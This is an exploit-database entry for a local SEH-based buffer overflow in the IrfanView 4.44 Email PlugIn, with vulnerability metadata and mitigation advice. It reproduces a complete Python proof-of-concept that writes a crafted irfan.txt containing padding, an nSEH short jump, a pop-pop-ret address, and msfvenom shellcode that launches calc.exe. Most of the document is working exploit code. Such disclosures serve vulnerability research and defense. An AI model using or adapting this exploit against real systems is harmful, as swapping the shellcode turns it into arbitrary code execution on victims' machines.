IrfanView 4.44 Email PlugIn - Local Buffer Overflow (SEH)

vendor:

IrfanView 4.44 Email PlugIn

by:

bzyo

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: IrfanView 4.44 Email PlugIn

Affected Version From: 4.44

Affected Version To: 4.44

Patch Exists: YES

Related CWE: N/A

CPE: a:irfan_skiljan:irfanview:4.44

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows XP SP3 x86 and Windows 7 SP1 x86

2018

IrfanView 4.44 Email PlugIn – Local Buffer Overflow (SEH)

A local buffer overflow vulnerability exists in IrfanView 4.44 Email PlugIn. An attacker can exploit this vulnerability by generating a malicious irfan.txt file, copying its contents to clipboard, opening IrfanView and a sample image from My Pictures, selecting Options, Send by Email, Settings, pasting contents from clipboard into Full Name and selecting OK, which will cause the application to crash and pop calc.

Mitigation:

Upgrade to the latest version of IrfanView 4.44 Email PlugIn.

Source

Exploit-DB raw data:

#!/usr/bin/python

#
# Exploit Author: bzyo
# Twitter: @bzyo_
# Exploit Title: IrfanView 4.44 Email PlugIn - Local Buffer Overflow (SEH)
# Date: 02-07-2018
# Vulnerable Software: IrfanView 4.44 Email PlugIn
# Vendor Homepage: http://www.irfanview.com/
# Version: 4.44
# Software Link: http://www.irfanview.info/files/irfanview_444.exe
# Software Link: http://www.irfanview.info/files/irfanview_plugins_444.zip
# Tested On: Windows XP SP3 x86 and Windows 7 SP1 x86
#
# PoC
# 1. generate irfan.txt, copy contents to clipboard
# 2. open IrfanView and a sample image from My Pictures (i.e. Chrysanthemum.jpg)
# 3. select Options, Send by Email, Settings
# 4. paste contents from clipboard into Full Name and select OK
# 5. application crashes
# 6. pop calc
#   

filename="irfan.txt"

junk = "\x41"*1236

#jump 6
nseh = "\xeb\x06\x90\x90"

#0x10021420 : pop ebp # pop ebx # ret
seh = "\x20\x14\x02\x10"

#msfvenom -p windows/exec CMD=calc.exe -b "\x00\x0a\x0d" -f c
#Payload size: 220 bytes
calc = (
"\xda\xdf\xba\x32\x98\xc1\x8e\xd9\x74\x24\xf4\x58\x31\xc9\xb1"
"\x31\x83\xe8\xfc\x31\x50\x14\x03\x50\x26\x7a\x34\x72\xae\xf8"
"\xb7\x8b\x2e\x9d\x3e\x6e\x1f\x9d\x25\xfa\x0f\x2d\x2d\xae\xa3"
"\xc6\x63\x5b\x30\xaa\xab\x6c\xf1\x01\x8a\x43\x02\x39\xee\xc2"
"\x80\x40\x23\x25\xb9\x8a\x36\x24\xfe\xf7\xbb\x74\x57\x73\x69"
"\x69\xdc\xc9\xb2\x02\xae\xdc\xb2\xf7\x66\xde\x93\xa9\xfd\xb9"
"\x33\x4b\xd2\xb1\x7d\x53\x37\xff\x34\xe8\x83\x8b\xc6\x38\xda"
"\x74\x64\x05\xd3\x86\x74\x41\xd3\x78\x03\xbb\x20\x04\x14\x78"
"\x5b\xd2\x91\x9b\xfb\x91\x02\x40\xfa\x76\xd4\x03\xf0\x33\x92"
"\x4c\x14\xc5\x77\xe7\x20\x4e\x76\x28\xa1\x14\x5d\xec\xea\xcf"
"\xfc\xb5\x56\xa1\x01\xa5\x39\x1e\xa4\xad\xd7\x4b\xd5\xef\xbd"
"\x8a\x6b\x8a\xf3\x8d\x73\x95\xa3\xe5\x42\x1e\x2c\x71\x5b\xf5"
"\x09\x8d\x11\x54\x3b\x06\xfc\x0c\x7e\x4b\xff\xfa\xbc\x72\x7c"
"\x0f\x3c\x81\x9c\x7a\x39\xcd\x1a\x96\x33\x5e\xcf\x98\xe0\x5f"
"\xda\xfa\x67\xcc\x86\xd2\x02\x74\x2c\x2b")

fill = "\x44"*1000

buffer = junk + nseh + seh + calc + fill
  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()